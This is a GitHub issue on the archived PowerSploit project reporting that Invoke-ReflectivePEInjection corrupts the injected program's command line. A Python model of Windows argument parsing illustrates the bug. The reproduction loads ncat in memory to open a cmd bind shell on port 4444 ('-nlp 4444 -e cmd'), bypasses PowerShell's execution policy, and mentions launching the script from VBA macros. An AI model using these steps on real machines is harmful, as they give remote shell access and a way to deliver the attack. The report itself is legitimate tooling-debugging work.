This repository has been archived by the owner on Jan 21, 2021. It is now read-only.
I'd like to report an issue with the code handling buffer jugglings around the process' command line.
When PowerShell gets executed with some of its own inner arguments, like `powershell -ep bypass`, the joined process' own command line and the one produced from parsing -ExeArgs lead to undefined behaviour and a corrupted command line.
Here's the example:
Start up the PowerShell interpreter like so: `powershell -ep bypass`
We are invoking `Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd"`
The PE image being injected is the classic `ncat.exe` coming straight from nmap.org.
The resulting verbose output becomes:
PS C:\Users\IEUser\Desktop> .\decoded.ps1
VERBOSE: PowerShell ProcessID: 6076
VERBOSE: Calling Invoke-MemoryLoadLibrary
VERBOSE: Getting basic PE information from the file
VERBOSE: Allocating memory for the PE and write its headers to memory
VERBOSE: Getting detailed PE information from the headers loaded in memory
VERBOSE: StartAddress: 0x0AAC0000 EndAddress: 0x0AB2D000
VERBOSE: Copy PE sections in to memory
VERBOSE: Update memory addresses based on where the PE was actually loaded in memory
VERBOSE: Import DLL's needed by the PE we are loading
VERBOSE: Done importing DLL imports
VERBOSE: Update memory protection flags
VERBOSE: Call EXE Main function. Address: 0x0AB04C04. Creating thread for the EXE to run in.
Ncat: Could not resolve hostname "bypass": The requested name is valid, but no data of the requested type was found. . QUITTING.
VERBOSE: EXE thread has completed.
VERBOSE: Done!
PS C:\Users\IEUser\Desktop>
Now, one can clearly observe that ncat complains about its inability to resolve the `bypass` host. This must be an issue with the EXE args being appended to the original process' command line, or the fact that the original process command line has not been previously zeroed out, or something.
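As an added illustration (not PowerSploit's own code), the following Python models the tokenising an injected image performs on its command line and shows why appending -ExeArgs to the host's untouched command line leaves "bypass" as the positional (hostname) argument. The host command line is taken from the report, the tokenising rules are a simplification of the documented Windows rules, and the option table is a constructed approximation of ncat's short options.

```python
# Added example: Windows-style command line tokenising (simplified
# CommandLineToArgvW rules: whitespace splits, double quotes group, 2n
# backslashes before a quote -> n backslashes, 2n+1 -> n plus a literal quote).
def win_argv(cmdline):
    args, cur, in_quotes, have_arg, i, n = [], [], False, False, 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == '\\':
            j = i
            while j < n and cmdline[j] == '\\':
                j += 1
            nbs = j - i
            if j < n and cmdline[j] == '"':
                cur.append('\\' * (nbs // 2))
                if nbs % 2:              # odd count: escaped literal quote
                    cur.append('"')
                    j += 1
            else:
                cur.append('\\' * nbs)
            i, have_arg = j, True
        elif c == '"':
            in_quotes, have_arg, i = not in_quotes, True, i + 1
        elif c in ' \t' and not in_quotes:
            if have_arg:
                args.append(''.join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg, i = True, i + 1
    if have_arg:
        args.append(''.join(cur))
    return args

HOST_CMDLINE = 'powershell -ep bypass'   # host interpreter's own command line (from the report)
EXE_ARGS = '-nlp 4444 -e cmd'            # the -ExeArgs value from the report

def corrupted_argv(host_cmdline=HOST_CMDLINE, exe_args=EXE_ARGS):
    # ExeArgs glued onto the unchanged host command line: "-ep bypass" survives.
    return win_argv(host_cmdline + ' ' + exe_args)

def rebuilt_argv(exe_name, exe_args=EXE_ARGS):
    # What the EXE should see: its own image name followed only by ExeArgs.
    return win_argv('"%s" %s' % (exe_name, exe_args))

def positional(argv, value_opts='pe'):
    # getopt-style scan of short-option clusters (assumed: -p and -e take a value);
    # the first value-taking letter eats the rest of its cluster or the next token.
    out, skip = [], False
    for tok in argv[1:]:
        if skip:
            skip = False
        elif tok.startswith('-'):
            for k, letter in enumerate(tok[1:]):
                if letter in value_opts:
                    skip = (k == len(tok) - 2)
                    break
        else:
            out.append(tok)
    return out
```

With the corrupted command line, `positional(corrupted_argv())` yields `['bypass']`, which is exactly the hostname ncat complains about; with `rebuilt_argv('ncat.exe')` the positional list is empty.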
The exact invocation is kinda like:
The same behaviour goes for other invocations, like from VBA macro code leveraging `Shell(" [...] powershell -ep bypass -file decoded.ps1")`.